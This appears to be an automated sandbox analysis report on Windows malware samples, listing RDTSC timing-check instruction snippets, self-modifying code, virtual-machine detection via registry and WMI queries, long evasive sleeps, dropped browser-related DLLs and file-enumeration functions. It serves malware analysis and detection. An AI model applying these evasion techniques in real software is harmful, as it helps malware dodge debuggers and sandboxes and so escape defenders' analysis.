Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC02D9 second address: 4EC030A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, C6h 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F0E94F51A51h 0x00000015 jmp 00007F0E94F51A4Bh 0x0000001a popfd 0x0000001b movzx esi, bx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC030A second address: 4EC031F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FC1h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E601E0 second address: 4E601E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E601E8 second address: 4E60219 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E948C9FC8h 0x00000008 mov di, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov dx, ax 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov ecx, ebx 0x0000001a movsx edx, si 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC06F8 second address: 4EC06FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC06FE second address: 4EC074A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d push ecx 0x0000000e call 00007F0E948C9FBDh 0x00000013 pop esi 0x00000014 pop edx 0x00000015 mov si, C06Dh 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d call 00007F0E948C9FC6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC074A second address: 4EC07BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov edx, 78C2B0E4h 0x0000000a popad 0x0000000b push dword ptr [ebp+0Ch] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F0E94F51A59h 0x00000015 sub ax, 2FD6h 0x0000001a jmp 00007F0E94F51A51h 0x0000001f popfd 0x00000020 jmp 00007F0E94F51A50h 0x00000025 popad 0x00000026 push dword ptr [ebp+08h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c movsx edi, si 0x0000002f call 00007F0E94F51A56h 0x00000034 pop eax 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC07BC second address: 4EC07D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FC7h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC07D7 second address: 4EC0805 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call 00007F0E94F51A49h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC0805 second address: 4EC0818 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC0818 second address: 4EC085D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F0E94F51A4Ah 0x00000013 jmp 00007F0E94F51A55h 0x00000018 popfd 0x00000019 push esi 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC085D second address: 4EC0863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC0863 second address: 4EC0867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC0867 second address: 4EC08EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 call 00007F0E948C9FBFh 0x00000015 pushfd 0x00000016 jmp 00007F0E948C9FC8h 0x0000001b xor esi, 52B44698h 0x00000021 jmp 00007F0E948C9FBBh 0x00000026 popfd 0x00000027 pop ecx 0x00000028 jmp 00007F0E948C9FC9h 0x0000002d popad 0x0000002e mov eax, dword ptr [eax] 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F0E948C9FC3h 0x00000039 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC08EF second address: 4EC090C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC090C second address: 4EC0933 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0E948C9FBCh 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C4D17 second address: 5C4D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5B8F30 second address: 5B8F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5B8F39 second address: 5B8F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0E94F51A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5B8F43 second address: 5B8F49 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5B8F49 second address: 5B8F6C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0E94F51A55h 0x0000000d jne 00007F0E94F51A46h 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C3D32 second address: 5C3D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C3D36 second address: 5C3D3F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C3D3F second address: 5C3D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0E948C9FC0h 0x0000000c jmp 00007F0E948C9FBEh 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C3EB8 second address: 5C3F02 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0E94F51A55h 0x0000000b jmp 00007F0E94F51A4Bh 0x00000010 jbe 00007F0E94F51A52h 0x00000016 popad 0x00000017 push eax 0x00000018 push ebx 0x00000019 push edi 0x0000001a pop edi 0x0000001b push eax 0x0000001c pop eax 0x0000001d pop ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jbe 00007F0E94F51A46h 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C3F02 second address: 5C3F06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C4079 second address: 5C40A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0E94F51A4Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0E94F51A4Fh 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C40A1 second address: 5C40A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C40A5 second address: 5C40C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E94F51A56h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C40C1 second address: 5C40C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C40C7 second address: 5C40D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E94F51A4Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C40D8 second address: 5C40DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C4625 second address: 5C4639 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A50h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C6C9B second address: 5C6CEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jns 00007F0E948C9FD0h 0x00000011 push esi 0x00000012 jmp 00007F0E948C9FC8h 0x00000017 pop esi 0x00000018 pop eax 0x00000019 mov dword ptr [ebp+122D18C5h], eax 0x0000001f push 00000003h 0x00000021 and ecx, dword ptr [ebp+122D2834h] 0x00000027 push 00000000h 0x00000029 mov di, si 0x0000002c push 00000003h 0x0000002e mov edi, eax 0x00000030 call 00007F0E948C9FB9h 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C6CEC second address: 5C6D13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0E94F51A57h 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push ebx 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Special instruction interceptor: First address: ABECF7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Special instruction interceptor: First address: ABEC2B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Special instruction interceptor: First address: C9B835 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Special instruction interceptor: First address: C8145C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Special instruction interceptor: First address: CFE86A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Special instruction interceptor: First address: 5F0237 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Special instruction interceptor: First address: 5F0678 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: F2ECF7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: F2EC2B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 110B835 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 10F145C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Special instruction interceptor: First address: 674853 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 116E86A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: BD0237 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: BD0678 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: C54853 instructions caused by: Self-modifying code

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Memory allocated: F80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Memory allocated: 2B90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Memory allocated: 1200000 memory reserve \| memory write watch

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe

Code function: 5_2_04EC0983 rdtsc

5_2_04EC0983

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1125
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1119
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1162
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1146
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1131
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1184
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 3508
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 3216
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 428
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Window / User API: threadDelayed 3869
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Window / User API: threadDelayed 4566

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\file.exe

API coverage: 6.3 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4676	Thread sleep count: 1125 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4676	Thread sleep time: -2251125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5804	Thread sleep count: 1119 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5804	Thread sleep time: -2239119s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6204	Thread sleep count: 1162 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6204	Thread sleep time: -2325162s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3920	Thread sleep count: 282 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3920	Thread sleep time: -8460000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6096	Thread sleep count: 1146 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6096	Thread sleep time: -2293146s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5828	Thread sleep count: 1131 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5828	Thread sleep time: -2263131s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4304	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5448	Thread sleep count: 1184 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5448	Thread sleep time: -2369184s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4708	Thread sleep count: 62 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4708	Thread sleep time: -124062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3372	Thread sleep count: 57 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3372	Thread sleep time: -114057s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5240	Thread sleep count: 242 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5240	Thread sleep time: -7260000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1896	Thread sleep count: 58 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1896	Thread sleep time: -116058s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1888	Thread sleep count: 3508 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1888	Thread sleep time: -7019508s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5020	Thread sleep time: -900000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4072	Thread sleep count: 3216 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4072	Thread sleep time: -6435216s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4072	Thread sleep count: 260 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4072	Thread sleep time: -520260s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1888	Thread sleep count: 428 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1888	Thread sleep time: -856428s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe TID: 2748	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe TID: 6648	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe TID: 8424	Thread sleep time: -150000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe TID: 8452	Thread sleep time: -48000s >= -30000s

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040D8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_004139B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040E270
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00401710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_004143F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	0_2_00414050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_004133C0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00401160 GetSystemInfo,ExitProcess,

0_2_00401160

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Thread delayed: delay time: 922337203685477

